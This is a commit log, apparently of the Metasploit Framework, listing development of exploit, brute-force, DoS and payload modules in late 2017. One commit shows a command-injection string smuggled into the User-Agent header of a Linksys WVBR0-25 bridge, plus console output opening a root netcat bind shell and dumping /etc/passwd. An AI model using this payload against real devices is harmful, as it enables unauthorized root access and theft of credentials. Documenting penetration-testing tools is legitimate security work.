Commit Graph

23371 Commits (42dbab763b1fbef87111eed3028df2b6306c86a7)

Author SHA1 Message Date
b0yd ec7625af9f Damn spaces... 2017-12-22 10:57:11 -05:00
b0yd 2b33b88fa4 Damn spaces 2017-12-22 10:54:31 -05:00
b0yd e088c95a99 Module Cleanup 2017-12-22 10:51:01 -05:00
Jon Hart b29948412e
Correct permissions, fixing warning 2017-12-22 07:27:11 -08:00
b0yd d657a9dc53 Commvault Remote Command Injection 2017-12-22 10:04:13 -05:00
headlesszeke 3dfb836768 Ranking upgrade and uses agent key instead of manually setting user-agent in headers 2017-12-21 23:10:26 -06:00
headlesszeke b31ac73996 Ensure vulnerability check cannot false positive with the power of runtime randomness 2017-12-21 22:53:46 -06:00
William Vu caae33b417
Land #9170, Linux UDF for mysql_udf_payload 2017-12-21 20:48:24 -06:00
headlesszeke 8c3836cc88 Removed msf/core require statement and extraneous debug message 2017-12-21 19:55:56 -06:00
juushya a86abb0297 Implemented get_cookies_parsed 2017-12-22 05:36:36 +05:30
headlesszeke 2ee42e1433
Adds exploit module for CVE-2017-17411
This module is for exploiting vulnerable Linksys WVBR0-25 wireless video bridges using CVE-2017-17411. The vuln in question involves a command injection due to improper sanitization of the User-Agent header. The module makes an initial GET request to the root of the web server and checks the result for a vulnerable firmware version. If vulnerable, it makes a subsequent GET request with the User-Agent set to `";<payload> #`. This can be verified against WVBR0-25 devices running firmware < 1.0.41.

Example console output:

```
msf > use exploit/linux/http/linksys_wvbr0_user_agent_exec_noauth 
msf exploit(linksys_wvbr0_user_agent_exec_noauth) > info

       Name: Linksys WVBR0-25 User-Agent Command Execution
     Module: exploit/linux/http/linksys_wvbr0_user_agent_exec_noauth
   Platform: Unix
 Privileged: Yes
    License: Metasploit Framework License (BSD)
       Rank: Normal
  Disclosed: 2017-12-13

Provided by:
  HeadlessZeke

Available targets:
  Id  Name
  --  ----
  0   Automatic

Basic options:
  Name     Current Setting  Required  Description
  ----     ---------------  --------  -----------
  Proxies                   no        A proxy chain of format type:host:port[,type:host:port][...]
  RHOST                     yes       The target address
  RPORT    80               yes       The target port
  SSL      false            no        Negotiate SSL/TLS for outgoing connections
  VHOST                     no        HTTP server virtual host

Payload information:
  Space: 1024

Description:
  The Linksys WVBR0-25 Wireless Video Bridge, used by DirecTV to 
  connect wireless Genie cable boxes to the Genie DVR, is vulnerable 
  to OS command injection in version < 1.0.41 of the web management 
  portal via the User-Agent header. Authentication is not required to 
  exploit this vulnerability.

References:
  http://cvedetails.com/cve/2017-17411/
  http://www.zerodayinitiative.com/advisories/ZDI-17-973
  https://www.thezdi.com/blog/2017/12/13/remote-root-in-directvs-wireless-video-bridge-a-tale-of-rage-and-despair

msf exploit(linksys_wvbr0_user_agent_exec_noauth) > show payloads 

Compatible Payloads
===================

   Name                     Disclosure Date  Rank    Description
   ----                     ---------------  ----    -----------
   cmd/unix/bind_netcat                      normal  Unix Command Shell, Bind TCP (via netcat)
   cmd/unix/generic                          normal  Unix Command, Generic Command Execution
   cmd/unix/reverse_netcat                   normal  Unix Command Shell, Reverse TCP (via netcat)

msf exploit(linksys_wvbr0_user_agent_exec_noauth) > set payload cmd/unix/bind_netcat 
payload => cmd/unix/bind_netcat
msf exploit(linksys_wvbr0_user_agent_exec_noauth) > set RHOST 10.0.0.104
RHOST => 10.0.0.104
msf exploit(linksys_wvbr0_user_agent_exec_noauth) > exploit

[*] 10.0.0.104:80 - Trying to access the device ...
[*] Started bind handler
[*] 10.0.0.104:80 - Exploiting...
[*] Command shell session 1 opened (10.0.0.109:40541 -> 10.0.0.104:4444) at 2017-12-21 17:09:54 -0600
id

uid=0(root) gid=0(root)
^C
Abort session 1? [y/N]  y

[*] 10.0.0.104 - Command shell session 1 closed.  Reason: User exit
msf exploit(linksys_wvbr0_user_agent_exec_noauth) > set payload cmd/unix/generic 
payload => cmd/unix/generic
msf exploit(linksys_wvbr0_user_agent_exec_noauth) > set cmd cat /etc/passwd
cmd => cat /etc/passwd
msf exploit(linksys_wvbr0_user_agent_exec_noauth) > exploit

[*] 10.0.0.104:80 - Trying to access the device ...
[*] 10.0.0.104:80 - Exploiting...
[+] 10.0.0.104:80 - Command sent successfully
[*] 10.0.0.104:80 - Command output:  root0:0::/:/bin/sh nobody99:99:Nobody:/:/bin/nologin sshd22:22::/var/empty:/sbin/nologin admin1000:1000:Admin User:/tmp/home/admin:/bin/sh quagga1001:1001:Quagga
[*] Exploit completed, but no session was created.
msf exploit(linksys_wvbr0_user_agent_exec_noauth) >
```
2017-12-21 17:44:35 -06:00
Tod Beardsley 5dfb5d581a
Switch get_cookies to get_cookies_parsed
Am I doing it right? See #9333
2017-12-21 09:00:56 -06:00
Jon Hart 962bc71d10
Merge branch 'feature/mqtt' into feature/mqtt-login 2017-12-20 18:58:36 -08:00
Jon Hart 298cb16b1a
Set default USER/PASS files 2017-12-20 18:44:43 -08:00
Jon Hart b9af835d06
Style 2017-12-20 18:05:00 -08:00
Jon Hart d0b3abc14b
Better handling of MQTT endpoints which don't require authentication
Arguably this is working around LoginScanner's inability to provide
blank usernames AND passwords
2017-12-20 18:02:52 -08:00
Brent Cook 24907938bb
bump payloads, various fixes 2017-12-20 16:47:37 -06:00
Jon Hart 495c649c7d
Better printing 2017-12-20 14:40:42 -08:00
Jon Hart ed5f177fcd
syntax 2017-12-20 14:20:08 -08:00
Jon Hart e66ec85677
Set default u/p 2017-12-20 14:18:33 -08:00
Brent Cook 5fe9dba4dd
Land #9296, add iOS meterpreter support 2017-12-20 16:09:41 -06:00
Brent Cook df4f62cde9 bump to mettle 0.3.3 2017-12-20 15:58:17 -06:00
Jeffrey Martin 8cd7185a7f
Land #9313, Add DirectAdmin login_scanner module 2017-12-20 15:23:24 -06:00
Jeffrey Martin 7f8a5d3834
improved credential reporting 2017-12-20 15:09:11 -06:00
Nick Marcoccio 86ce3c8781 Made suggested changes and added documentation 2017-12-20 15:54:16 -05:00
Jon Hart 14c779b945
Fix rubocop warning 2017-12-20 12:44:27 -08:00
Jon Hart c817df0bbc
Add module for bruteforcing authentication on MQTT endpoints 2017-12-20 12:30:21 -08:00
Jon Hart 7e91274796
Add module for connecting to/discovering MQTT endpoints 2017-12-20 12:29:50 -08:00
Brent Cook a8b845fff9
Land #9283, Add node.js ws websocket library DoS module 2017-12-20 14:20:42 -06:00
Brent Cook 210f137b7b Merge branch 'upstream-master' into land-9296- 2017-12-20 12:07:53 -06:00
HD Moore 1619a3fcf1 Pull PPC targets for now 2017-12-20 08:33:53 -06:00
Nick Marcoccio ce457db1e3 fixed spaces at EOL 2017-12-20 09:24:30 -05:00
Nick Marcoccio d6024277fc fixed missing quote 2017-12-20 09:03:32 -05:00
Nick Marcoccio 139afe45a9 Add phpCollab 2.5.1 exploit module 2017-12-20 08:36:58 -05:00
Nick Marcoccio fe15ac3b82 Removed file committed by mistake 2017-12-20 08:27:18 -05:00
Nick Marcoccio fd2a0d3057 Add phpCollab 2.5.1 exploit module 2017-12-20 08:22:01 -05:00
EgiX a4098803b3
Remove OSVDB reference 2017-12-20 13:10:42 +01:00
Brent Cook 9fb445fbf0
Land #9300, Add private data type to auxiliary scanner ftp_login and telnet_login 2017-12-20 00:30:43 -06:00
Brent Cook 6b216f2a20
Land #9290, Fix OverrideLHOST/LPORT with http/s Meterpreter payloads 2017-12-20 00:26:06 -06:00
Tod Beardsley 216d00e39f
Use a random fname destination for /etc/passwd 2017-12-19 17:02:16 -06:00
Tod Beardsley e93282b71d
Drop calls to vprint_* 2017-12-19 16:53:02 -06:00
Tod Beardsley 2dc2ac134e
Don't default verbose 2017-12-19 16:48:41 -06:00
Jon Hart a2c5cc0ffb
Remove old deprecated modules 2017-12-19 07:56:16 -08:00
Jon Hart 7b386ea2c8
Fix msftidy warnings wrt Set-Cookie 2017-12-19 06:58:23 -08:00
Nick Marcoccio acc6951bf3 fixed typo 2017-12-19 08:35:11 -05:00
Tim 358aca9435
apple_ios/aarch64/shell_reverse_tcp 2017-12-19 15:42:21 +08:00
HD Moore 25a3863784 Update WIP for GoAhead LD_PRELOAD 2017-12-18 22:20:13 -06:00
Brent Cook 9f144ce8d4
Land #9151, mettle extension support + sniffer module 2017-12-18 21:49:40 -06:00
Tod Beardsley f0df1750de
Land #9180
Land @RootUp's Samsung browser SOP module
2017-12-18 17:28:03 -06:00
Tod Beardsley 85350a9645
Add Rapid7 blog references 2017-12-18 17:11:47 -06:00
Tod Beardsley ae4edd65e1
Hard wrap descriptions 2017-12-18 17:03:13 -06:00
Tod Beardsley 27a324237b
Initial commit for Cambium issues from @juushya
Note, these will trigger a bunch of WARNING msftidy messages for setting
cookies directly. This is on purpose.
2017-12-18 16:32:55 -06:00
Jon Hart a33ed82a40
Land #9214, @realoriginal's update to the Cisco SMI scanner to also fetch Cisco IOS configs 2017-12-18 12:22:26 -08:00
HD Moore a44010deb1 WIP for GoAhead LD_PRELOAD 2017-12-18 10:51:47 -06:00
Brent Cook 2a94a4417a bump payloads 2017-12-18 10:01:10 -06:00
Nick Marcoccio 6d565b6c33 added author information 2017-12-18 09:18:36 -05:00
William Vu e9b9c80841
Fix #9307, credit to @r0610205 2017-12-18 03:55:01 -06:00
William Vu 76823e9fe6
Land #9183, Jenkins Groovy XStream RCE 2017-12-18 03:38:27 -06:00
William Vu d3638d0487
Land #9154, Tuleap PHP object injection exploit 2017-12-18 03:19:42 -06:00
William Vu 0e2a158abd Fix global var $is_check (make ivar @is_check) 2017-12-18 03:15:33 -06:00
Nick Marcoccio f447fa1a12 Added DirectAdmin Login Utillity 2017-12-17 22:43:37 -05:00
Pearce Barry 880a1d4283
Land #9312, Module acting as a Pyrotechnical Device Deployment Tool (PDT) for Hardware Bridge 2017-12-17 18:32:28 -06:00
Pearce Barry 8344401484
Add docs, minor tweaks. 2017-12-17 18:15:49 -06:00
RootUp 917dd8e846
Update samsung_browser_sop_bypass.rb 2017-12-16 22:10:02 +05:30
RootUp 8f91377acb
Update samsung_browser_sop_bypass.rb 2017-12-16 22:09:21 +05:30
Tod Beardsley 3b3b0e6e96
And this is why I hate using single quotes
Also, restored the store_cred call.

This will fix up RootUp/metasploit-framework#3 for PR #9180
2017-12-14 14:28:25 -06:00
jgor 0b3a5567a4 Add module for CVE-2017-13872 iamroot remote exploit via ARD (VNC) 2017-12-14 13:59:35 -06:00
Pearce Barry 048b39ccd6
Initial commit of pdt module. 2017-12-14 09:23:21 -06:00
nromsdahl 384b250659
Add credential data type
Added credential data type so that successful passwords are stored in the database and accessible via the creds command.
2017-12-14 08:07:59 -06:00
nromsdahl be4939b56a
Add credential data type
Added credential data type so a successful ftp login stores the password in the database to be accessed later by the creds command.
2017-12-14 08:05:57 -06:00
William Vu 3cd287ddd6 Update the MS17-010 scanner to use dcerpc_getarch 2017-12-14 02:08:30 -06:00
William Vu 8e4b007edc Move verify_arch to dcerpc_getarch
We can use this code elsewhere, such as the MS17-010 scanner.
2017-12-14 02:08:25 -06:00
Brent Cook c6a2ae2551
Land #9248, Add wd_mycloud_multiupload_upload exploit 2017-12-13 18:51:02 -06:00
Brent Cook 125a079fa9 add cve reference 2017-12-13 18:50:21 -06:00
h00die d7ad443be1 Merge branch 'master' of https://github.com/rapid7/metasploit-framework into upstream-master 2017-12-13 19:33:05 -05:00
h00die c0a534140d
Land #9284 a regex dos for ua_parser_js npm module 2017-12-13 19:31:49 -05:00
Wei Chen deacebc46b
Land #9264, Add private type when storing SSH password
Land #9264
2017-12-13 18:24:31 -06:00
Tod Beardsley 5226181d6d
Better conditionals from @bcoles 2017-12-13 16:48:05 -06:00
Tod Beardsley 966060d470
Nits picked by @bcoles: commas, quotes, and <head> 2017-12-13 16:38:17 -06:00
Nicholas Starke dd5532c5de Addressing Formatting Issues
There were several formatting and layout issues
that are fixed in this commit.  Also changing
`RHOSTS` to `RHOST`.
2017-12-13 14:26:27 -06:00
Wei Chen b99663fb6c
Bring #9282 up to date with upstream-master 2017-12-13 13:16:30 -06:00
Wei Chen 37514eec17
Land #9234, Add exploit for ClickJacking vuln for pfSense
Land #9234
2017-12-12 14:56:21 -06:00
Wei Chen c7019e5aee Only load files once 2017-12-12 14:54:49 -06:00
Tod Beardsley 622050ddfc
Oops, leftover comment 2017-12-12 14:48:00 -06:00
Tod Beardsley efa46efb48
Actually save creds, or fail through sanely
This incidentally also allows for a custom collector to be implemented
by the user -- for example, if they'd rather pick up a session ID or
inject a browser hook or something along those lines. It's a little
clunky, using the advanced option of CUSTOM_JS, but it seems to work
fine.
2017-12-12 14:06:18 -06:00
Wei Chen 6149f51273
Land #9256, Add aux module to discover WSDD enabled devices
Land #9256
2017-12-12 11:55:42 -06:00
Tim c4e20e01e3 iOS meterpreter 2017-12-12 23:23:21 +08:00
RootUp 5f70199218
Update samsung_browser_sop_bypass.rb 2017-12-12 15:52:55 +05:30
Brent Cook 3f6846c332 update payloads with python retry fix 2017-12-12 03:13:38 -06:00
securekomodo b335cacfc1
Update wp_slideshowgallery_upload.rb
Variable on line 67 needs to be changed to "user" from "username" which was undefined and causing error during exploit execution.

[-] Exploit failed: NameError undefined local variable or method `username' for #<Msf::Modules::Mod6578706c6f69742f756e69782f7765626170702f77705f736c69646573686f7767616c6c6572795f75706c6f6164::MetasploitModule:0x0055c61ab093f8>

After changing the incorrect variable name from "username" to "user", the exploit completes.
2017-12-12 00:33:28 -05:00
Matthew Kienow d79b0ad981
Land #9286, Advantech WebAccess webvrpcs BOF RCE 2017-12-12 00:25:56 -05:00
mr_me e7a2dd2e71 fixed email 2017-12-11 23:20:46 -06:00
mr_me 26e2eb8f1a Changed to good ranking 2017-12-11 23:14:36 -06:00
Pearce Barry 9a6c54840b
Minor tweak to use vprint... 2017-12-11 16:48:47 -06:00
Nicholas Starke 2d23054a1f Changes as per comments
A few things were changed as per the PR comments:
1) The module title was reworded
2) The module description was multi-lined
3) Negative logic was rewritten to use 'unless'
4) Strings which did not require interpolation were rewritten
5) Documentation markdown was added.
2017-12-11 14:11:40 -06:00
h00die ba174f3f92 updates per @bigendiansmalls fork 2017-12-11 14:40:09 -05:00
h00die 3c916c303d bcoles comments from #7334 2017-12-11 14:22:44 -05:00
mr_me f8977ed72c added some fixes 2017-12-11 11:34:17 -06:00
Ryan Knell c5f218c84c Addressing comments
1. Updated documentation
2. Made the Sec-WebSocket-Key header a random value
2017-12-11 11:49:31 -05:00
Chris Higgins e91830efe7 Add Dup Scout Enterprise login buffer overflow 2017-12-09 02:20:05 -06:00
Tod Beardsley cba5c7cb0f
Rename to actually call out the browser name 2017-12-08 13:53:13 -06:00
Tod Beardsley 0a9dcafb77
Actually collect the creds, sort of
Instead of an alert() (which the attacker won't see), this collects the
offered credentials in a POST action, and displays them in the console.

This should further store the creds somewhere handy, but this is good
enough for now for testing from @RootUp
2017-12-08 13:51:02 -06:00
Tod Beardsley aee883a706
Fixed up description to be descriptive 2017-12-08 12:24:58 -06:00
Pearce Barry 604b949e23
Updated per review comments. 2017-12-08 10:42:43 -06:00
mr_me 34ef650b0d fixed up msftidy, opps. 2017-12-07 17:03:39 -06:00
mr_me 75a82b3fe7 Advantech WebAccess webvrpcs ViewDll1 Stack-based Buffer Overflow Remote Code Execution Vulnerability 2017-12-07 16:34:26 -06:00
Austin 5a81f8091d
change some options for somethinf for sensible 2017-12-07 14:44:36 -05:00
Austin 335cc13cab
remove option, advanced Message seems to break it. 2017-12-07 14:17:14 -05:00
Austin 7bdc99a153
Fix HANDLER + some default options! 2017-12-07 13:53:39 -05:00
Nicholas Starke 306c5d20d9 Adding ua_parser_js ReDoS Module
"ua-parser-js" is an npm module for parsing browser
user-agent strings.  Vulnerable version of this module
have a problematic regular expression that can be exploited
to cause the entire application processing thread to "pause"
as it tries to apply the regular expression to the input.
This is problematic for single-threaded application environments
such as nodejs.  The end result is a denial of service
condition for vulnerable applications, where no further
requests can be processed.
2017-12-07 10:25:29 -06:00
Ryan Knell c992837f0d Adding ws DoS module
This module verifies if ws is vulnerable
to DoS by sending a request to the server
containing a specific header value.
ws is a npm module which handles websockets.
2017-12-07 10:45:57 -05:00
Austin 09aa433fdc
Add MESSAGE field for "obfuscation" 2017-12-07 08:04:31 -05:00
Austin 8bb6a8f47c
Rename office_dde_delivery to office_dde_delivery.rb 2017-12-06 22:40:37 -05:00
Austin 9d11c60d88
Office DDE Payload Delivery
Generate / Inject existing RTF files with DDE Payloads!
2017-12-06 21:41:00 -05:00
bwatters-r7 4ca595eb15
wvu-suggested fix 2017-12-05 11:55:17 -06:00
William Webb adba277be0
axe errant spaces at EOL 2017-12-04 16:57:48 -08:00
William Webb 69b01d26bb
Land #9226, Microsoft Office OLE object memory corruption 2017-12-04 16:50:27 -08:00
William Vu 19b37c7070
Land #9263, drb_remote_codeexec fixes
See pull requests #7531 and #7749 for hysterical raisins.
2017-12-04 18:45:03 -06:00
Brent Cook b13f4e25e1 thanks for making this well-known 2017-12-04 18:32:31 -06:00
Brent Cook a27bb38d51 add authors 2017-12-04 18:25:18 -06:00
Austin b96dac28d5
fix info segment 2017-12-04 16:42:41 -05:00
Brent Cook f83e9815dd
Land #9210, Add a Polycom HDX RCE 2017-12-04 12:49:35 -06:00
Brent Cook 7edab268f5 handle case-insensitive password, fix received 2017-12-04 12:47:40 -06:00
Austin 06334aa2bd
Update polycom_hdx_traceroute_exec.rb 2017-12-04 11:05:01 -05:00
Yorick Koster 942e44ceae Added local copies of the static content 2017-12-02 10:14:14 +01:00
wetw0rk 4cbb5f2619 added new target 2017-12-01 18:35:45 -06:00
Jacob Robles c79186593a Update DiskBoss Module (EDB 42395)
Added a new target option for the
DiskBoss Server.
2017-12-01 15:08:57 -06:00
bwatters-r7 d1d8e3a678
Let's not rescue everything..... 2017-12-01 10:58:18 -06:00
Austin c788e4e540
Update office_ms17_11882.rb 2017-12-01 11:36:03 -05:00
Austin 7df46b33e8
disassembly ASM 2017-12-01 08:03:56 -05:00
bwatters-r7 6752770695
Shut up rubocop 2017-11-30 20:45:11 -06:00
bwatters-r7 e3dc17dd92
Add some extra targets 2017-11-30 16:16:34 -06:00
bwatters-r7 3b2a0be200 First swing at osx x64 meterpreter support 2017-11-30 14:47:46 -06:00
Zenofex 1ced3994b0 Added more reference urls to wd_mycloud_multiupload_upload module. 2017-11-30 12:53:33 -06:00
nromsdahl b24f70c7c6
Update ssh_login.rb
Added credential data type so password is stored in creds.
2017-11-30 11:02:06 -06:00
Brent Cook c288dab338 fixup RHOST/RPORT expectations if only URI is set 2017-11-30 10:51:02 -06:00
Brent Cook d689b33d7e more error handling, deal with user error 2017-11-30 08:31:13 -06:00
Brent Cook 87e683c763 add back kill syscall for trap method 2017-11-30 08:12:15 -06:00
Brent Cook a0e0e1db15 allow manual targeting, handle errors better 2017-11-30 07:51:12 -06:00
Brent Cook eea72663b3 warn on method failure instead of error 2017-11-30 06:37:21 -06:00
Brent Cook 9f12b794da cleanup comments 2017-11-30 06:37:04 -06:00
Brent Cook 5da34e8f2b support RHOST/RPORT 2017-11-30 06:36:42 -06:00
Brent Cook 59580195b4 resurrect old methods, try all 3 2017-11-30 06:16:05 -06:00
Brent Cook 51a18b68fe
Land #9211, handle 2016 DC's with hashdump gracefully 2017-11-29 17:26:33 -06:00
Brendan Coles 283b7c5145 Add WS-Discovery Information Discovery module 2017-11-29 12:21:22 +00:00
Tim W 58897bf2fc msftidy 2017-11-29 16:36:50 +08:00
Tim W 7f1f7281f1 add local exploit for osx root login with no password 2017-11-29 16:06:02 +08:00
Austin 676a08b849
Update polycom_hdx_traceroute_exec.rb 2017-11-28 22:01:41 -05:00
Austin 2544b4d8db
Change target name 2017-11-28 21:39:04 -05:00
Austin cb7f173811
Update office_ms17_11882.rb 2017-11-28 21:36:25 -05:00
Zenofex d174ef3a70 Add wd_mycloud_multiupload_upload exploit 2017-11-28 07:12:00 -06:00
bwatters-r7 244acc48b6
Land #9212, pfsense group member exec module 2017-11-27 11:27:29 -06:00
Brent Cook 2c6cfabbc3
Land #8948, allow configuring payload HTTP headers for domain fronting 2017-11-25 10:08:22 -06:00
Brent Cook 8645a518b3 add mettle support for custom headers 2017-11-24 20:27:34 -06:00
vipzen 0d79a3a3e2 Add support to Windows .NET Server 2017-11-23 08:35:55 -02:00
WhiteWinterWolf bfd5c2d330
Keep the initial option name 'ADMIN_ROLE' 2017-11-22 22:03:56 +01:00
Adam Cammack 778e69f929
Land #9229, Randomize slowloris HTTP headers 2017-11-22 14:42:24 -06:00
attackdebris ae43883e2b Fix mongodb_login typo 2017-11-22 08:03:12 -05:00
Austin 960893b99d
change default payload 2017-11-22 06:36:46 -05:00
Yorick Koster a02a02cb0c
Fixed URL... 2017-11-22 11:31:23 +01:00
Yorick Koster d21d3c140e
Fixed date 2017-11-22 11:15:34 +01:00
Yorick Koster 916ee05cce Add exploit module for Clickjacking vulnerability in CSRF error page pfSense 2017-11-22 11:06:22 +01:00
Austin 99555dde02
sleep! per feedback 2017-11-21 21:33:29 -05:00
Jon Hart 5484ee840e
Correct port when eating cisco config 2017-11-21 18:09:51 -08:00
Jon Hart bdc822c67d
Improve logging when requesting config 2017-11-21 18:09:02 -08:00
Jon Hart 5a358db260
Clean up shutdown messaging 2017-11-21 17:55:17 -08:00
Jon Hart 93c424c255
Remove unused 2017-11-21 17:54:31 -08:00
Jon Hart b0d8b0a191
Clean up incoming file handling 2017-11-21 17:54:02 -08:00
Jon Hart 879db5cf38
Land #9050, @mpizala's improvements to the docker_daemon_tcp module 2017-11-21 17:13:24 -08:00
Austin 275f70e77e
better saving 2017-11-21 19:34:04 -05:00
Austin db4c0fcca9
spelling 2017-11-21 19:02:14 -05:00
Matthew Kienow 785e5944d6
Enhanced slowloris HTTP headers and minor cleanup 2017-11-21 18:19:20 -05:00
Matthew Kienow b6c81e6da0
Reimplement slowloris as external module 2017-11-21 16:21:01 -05:00
Daniel Teixeira db2bd22d86
Update slow_loris.rb 2017-11-21 15:49:45 -05:00
Matthew Kienow e07fe77a69
Close sockets to resolve file handle error 2017-11-21 15:49:45 -05:00
Daniel Teixeira 52f56527d8
Update slow_loris.rb 2017-11-21 15:49:45 -05:00
Daniel Teixeira 74becb69e8
Update slow_loris.rb 2017-11-21 15:49:45 -05:00
Daniel Teixeira b7bc68c843
Update slow_loris.rb 2017-11-21 15:49:44 -05:00
Daniel Teixeira 53123d92e2
Update slow_loris.rb 2017-11-21 15:49:44 -05:00
Daniel Teixeira 21a6d0bd6e
Update slow_loris.rb 2017-11-21 15:49:44 -05:00
Daniel Teixeira 60878215e0
Update slow_loris.rb 2017-11-21 15:49:43 -05:00
Daniel Teixeira 9457359b11
Update slow_loris.rb 2017-11-21 15:49:43 -05:00
Daniel Teixeira 29017b8926
Update slow_loris.rb 2017-11-21 15:49:43 -05:00
Daniel Teixeira f79b41edde
Slow Loris 2017-11-21 15:48:11 -05:00
Brent Cook a7932ffe0e fix sizes 2017-11-21 14:31:14 -06:00
Austin fcea6fd8d4
actually create new file ;-; 2017-11-21 15:00:06 -05:00
Brent Cook 4050985649
update payloads 2017-11-21 13:53:33 -06:00
Brent Cook 1fd7f7c8bc prefix MeterpreterUserAgent and PayloadProxy* with Http for consistency,
this also adds aliases where needed
2017-11-21 13:47:19 -06:00
Austin 39a4d193a1
Create office_ms17_11882.rb 2017-11-21 14:47:02 -05:00
Robin Verton 52356e00b7 Use stylistic suggestions from rubocop 2017-11-21 14:30:13 +01:00
h00die dd8238d146 rubocop got a donut 2017-11-20 20:08:28 -05:00
Adam Cammack dd57138423
Make external module read loop more robust
Changes from a "hope we get at most one message at a time" model to
something beginning to resemble a state machine. Also logs error output
and fails the MSF module when the external module fails.
2017-11-20 16:52:05 -06:00
Austin cfd06ab24a
what was i thinking? 2017-11-20 16:08:48 -05:00
Austin b6e2e2aa45
adjust delay 2017-11-19 09:43:18 -05:00
h00die 579d012fa2 spelling 2017-11-19 08:36:27 -05:00
h00die b7f7afb3be version detect, 2.2.6 handling 2017-11-19 08:28:07 -05:00
Austin 1087b8ca16
cleanup 2017-11-18 20:09:29 -05:00
Austin 35567e3e23
Fix - copy system:running-config tftp://ip/file
Copies running config directly to TFTP server, thus removing the need to delete the file :D.
2017-11-18 13:02:12 -05:00
Austin f84f824a71
remove ? 2017-11-17 16:15:18 -05:00
Austin b457c60542
WORK IN PROGRESS - "GET"
Work in progress of GET, and PUT. PUT works fine for grabbing the configuration. GET will be used for service a config to execute commands , or the also WIP action "UPLOAD"
2017-11-17 15:36:27 -05:00